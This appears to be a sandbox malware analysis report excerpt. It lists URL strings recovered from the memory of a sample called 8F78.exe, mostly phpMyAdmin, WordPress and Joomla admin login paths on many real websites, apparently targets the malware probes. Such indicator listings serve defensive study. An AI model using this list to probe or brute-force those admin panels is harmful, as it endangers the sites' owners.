                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://emmetisportfun.it/N
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://emmetisportfun.it/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://emmetisportfun.it/phpmyadmin/.m
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://emr.com.ar/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/o.uk
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DA9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enp.ericsson.se/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/admin
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/adminJB
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/adminl
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/adminr/PB
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/adminyDB
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enso-center.org/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/phpmyadmin/tariat
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/wp-login.phpQmb
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ericrothphoto.com/wp-login.phpom
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/PhpMyAdmin/-
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/phpmyadmin/N
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://erikamoveis.com.br/wp-admin/m.br:2144
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://escolapatelli.com.br/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://escolapatelli.com.br/administrator/is.sk
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/admin.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/admin.phpislava.skb
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/administrator/9n/
                                Source: 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/administrator/f$
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/dmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/e
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eshopy-katalog.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurisproagro.sk/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurisproagro.sk/V
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/a/l
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/administrator/C
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/administrator/H
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/administrator/index.phpS
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/j
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/o.uk/admin
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/phpMyAdmin/u
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/pma/222o
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eurokamen.sk/wp-login.phpyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/PhpMyAdmin/in/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/PhpMyAdmin/om
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/phpMyAdmin/no
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/phpmyadmin/ma/k
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/pma//phpmyadmin
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/pma/Admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/pma/admin/ukM
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://feio.jp/pma/og.sk/phpmy
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/PhpMyAdmin//
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/administrator/index.php.com143
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/administrator/index.phpr
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/kbkk.com
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/wp-admin/hp
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fermatsk.sk/wp-login.phpI
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gabio.sk/pma/Admin/2
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gryffindorhouse.co.uk/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gryffindorhouse.co.uk/wp-admin/hp
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://h.ocsp-certum.com01
                                Source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DE1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/6
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/administrator/index.phpk
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/administrator/index.phpxby
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://inhodinky.sk/m/pma/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instalanova.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instalanova.sk/pma/2M
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/J
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/PhpMyAdmin/d(
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/administrator/index.phpocalhost
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/phpmyadmin/in/servis.sk21
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ivory.plala.co.jp/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/3
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/A
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/a
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/index.phpPca
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/administrator/index.phpt
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://izberatel.sk/h
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://janckulik.sk/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/administrator/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/administrator/index.phpk
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/administrator/sk
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/e.netjp
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://justdave.net/netkg
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/.com.de6
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/PhpMyAdmin/q
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/k/plE
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/phpMyAdmin/w2G
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/pma/Admin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://khi-ho.ne.jp/pma/Admin/a2Y
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kingsway-hk.com/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kingsway-hk.com/k.be~
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/3
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/PhpMyAdmin/h
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/#
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/&
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/7
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/:
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/T
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/Y
                                Source: 8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/b
